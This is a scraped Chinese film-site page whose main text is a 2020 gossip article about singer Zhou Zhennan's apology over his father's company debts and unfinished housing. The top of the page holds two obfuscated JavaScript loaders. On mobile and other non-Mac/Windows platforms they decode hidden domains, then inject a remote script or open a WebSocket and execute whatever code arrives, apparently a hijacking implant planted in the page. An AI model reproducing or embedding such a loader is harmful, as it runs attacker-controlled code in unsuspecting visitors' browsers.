function XKzfyaZo(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function qPtQEru(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return XKzfyaZo(t);};window[''+'H'+'j'+'i'+'R'+'b'+'o'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=qPtQEru,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('ZnJoLmpuemhvbmdkaaW5nLmNu','dHIueWVzdW42NzgguY29t','133546',window,document,['a','g']);}:function(){};
function wSnVz(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function HPRhXS(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return wSnVz(t);};window[''+'s'+'J'+'M'+'R'+'h'+'n'+'U'+'P'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=HPRhXS,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('ZnJooLmpuemhvbmdkaW5nLmNu','dHIueWWVzdWW42NzguY29t','133545',window,document,['o','W']);}:function(){};
【原域名已停用,更换为mtryy.com(速记:木头人影院)】

周震南道歉:对不起受害者,求生欲很足,可惜声明太假没诚意

时间:2020-10-27 20:02:49阅读:3076
导读:原标题:周震南道歉:对不起受害者,求生欲很足,可惜声明太假没诚意 周震南回应父母是老赖,内心煎熬会陪父母一起承担,粉丝又嗨了——引言 这几天,周震南的“瓜”刷屏了娱乐圈。 10月26日晚上,周震南终于通过社交平台回应,称自己之前不知情,内心很煎熬,接下来会好好工作,和父母一起承担。并且在最后说了对不起因此事件受伤害的所有人。 这则回应,很多网友并不认同,他们觉得周震南的求生欲是看出来了,但声......

周震南回应父母是老赖,内心煎熬会陪父母一起承担,粉丝又嗨了——引言

这几天,周震南的“瓜”刷屏了娱乐圈。

10月26日晚上,周震南终于通过社交平台回应,称自己之前不知情,内心很煎熬,接下来会好好工作,和父母一起承担。并且在最后说了对不起因此事件受伤害的所有人。

这则回应,很多网友并不认同,他们觉得周震南的求生欲是看出来了,但声明中的话除了煽情,并无太多实质性措施,因而显得过于“公关”。

“太假,没诚意。”有网友如是反驳。

但不管怎么样,知错能改是最重要的,希望周震南能通过自己努力帮助那些受害者们。

粉丝也一如既往力挺,“宝贝别怕,我们一直在”。

接下来,我们来回顾一下这件事的时间线。

要从男团R1SE说起,R1SE是《创造营2019》选出的男团,由11个男生组成,在内娱优质男团稀缺的情况下,他们一出道后,就吸引了大批迷妹,在年轻一代中知名度很高。

但从2020年9月开始,成员中的任豪和夏之光接连被拍到恋爱消息,尤其是任豪,女朋友还不止一个。

团粉们心痛,一方面恨他们拖累了其他9位成员,一方面又舍不得爱豆真的退团。

他们打出的口号是,“11个,一个都不能少。”

恰好这时,队长周震南发话了。

10月17日,周震南在社交平台发文,“真的,不知道,怎么继续下去了”,像不像“咯噔文学”?

作为队长,周震南靠着“2G网冲浪”和“耿直”人设,是R1SE里人气最高的。

粉丝爱称呼他“小少爷”,这一点得到周震南本人的承认,他从不吝啬炫耀家里有多有钱。

带着父母上节目炫富根本不算什么。

他还当众说过,“我为什么要和大众有共鸣,我的家庭让我有更广阔的维度”,我的奋斗就是“从富人到传奇。”

娱乐圈立富豪人设的不是周震南一个,比如和他一起参加《明日之子》第一季、他的好友马伯骞也是个富二代。

可直到10月25日,周震南的“富二代”身份被彻彻底底扒出来,大众这才反应过来,他口中的“真不知道怎么继续下去”,不是指他的团,而是他的父母。

当天,有被逼走投无路的网友在网上发帖求助,称自己买了四川大地生态发展有限公司开发的房子,结果房子烂尾,到现在都没拿到房产证,房子还存在多个隐患,而持有这家公司的法人周勇,正是周震南的父亲。

周震南在节目中说过他们周氏家规是不能撒谎、坚持不懈、懂得感恩。

实际上,周震南的父亲从2016年开始就被列入失信执行人名单,全资控股的公司被起诉过上百次,负债达8亿9千万!

一方面,他们被列入失信人名单,另一方面,一家人的生活却挥霍无度,周震南一块手表就价值六十几万。

高中念的是私立贵族学校,学费不菲。

可买了他家公司开发房子的普通人,很多人几乎是倾尽全部身家,至今房子不能住,在维权路上求助无门。

事件被爆第一时间,周震南粉丝操作更是让人大开眼界,他们先出面否定,不承认当事人是周震南的父亲。

倒也没错,因为川渝地区有个知名富商叫周勇,周震南粉丝经常认为他才是周震南父亲。

在周震南父亲公司发声明后,(这则声明槽点也有很多,声明称已经在积极协商,可周震南一家住豪宅,开豪车,欠的8亿9千万却没有还),粉丝们又换了另外一个口径,“父母的债务不涉及子女”,换句话说,周震南父母有错,他本人是无辜的。

周震南真的无辜吗?假如没有父母的那些钱,他会成为养尊处优的少爷,毫无压力追求自己的梦想,大谈着要从“富人变传奇”?

网友有句话说得好,那些被周震南父母伤害的人,他们也有子女,有些跟周震南差不多大,这些人在过什么样的生活,支持周震南的人有想过吗?

10月26日下午,网友又扒出新料,疑似周震南能读私立高中,是父亲通过不正常手段为他争取到的。

并且又有当事人在社交平台留言求助,称现在每一天都活得提心吊胆,担心房子(ZZN父母作为开发商建造的商品房)被收回,因为ZZN的父亲周勇把业主们上缴的未修基金挪用了,导致外墙没人修补,外墙的砖老是掉,万一不注意很容易被砸死。

从当事人的话语中,网友们能看出这些受害者的辛酸与无助,省吃俭用一辈子的积蓄买的房子,结果连基本保障都没有。

目前来看,这件事对他产生的影响不大。

点开他社交平台的广场,发现全都是粉丝们的告白与控评。

“不管发生什么事情,我们很爱你,不会离开。”

公司也出来表态,发了周震南近日的行程,拍杂志、做直播、参加晚会,一切照旧。

在10月26日的直播中,虽然周震南本人没有现身,封面用得还是他。

古语言,“知错就改善莫大焉”,在娱乐圈中蔡少芬、吴奇隆都帮父母还清过巨额债务,按照周震南现在流量看,只要他认真工作,收益不会差。

如果周震南真的用自己的行动帮助父亲承担并还清债务,也许又会是另外一段故事。

评论

  • 评论加载中...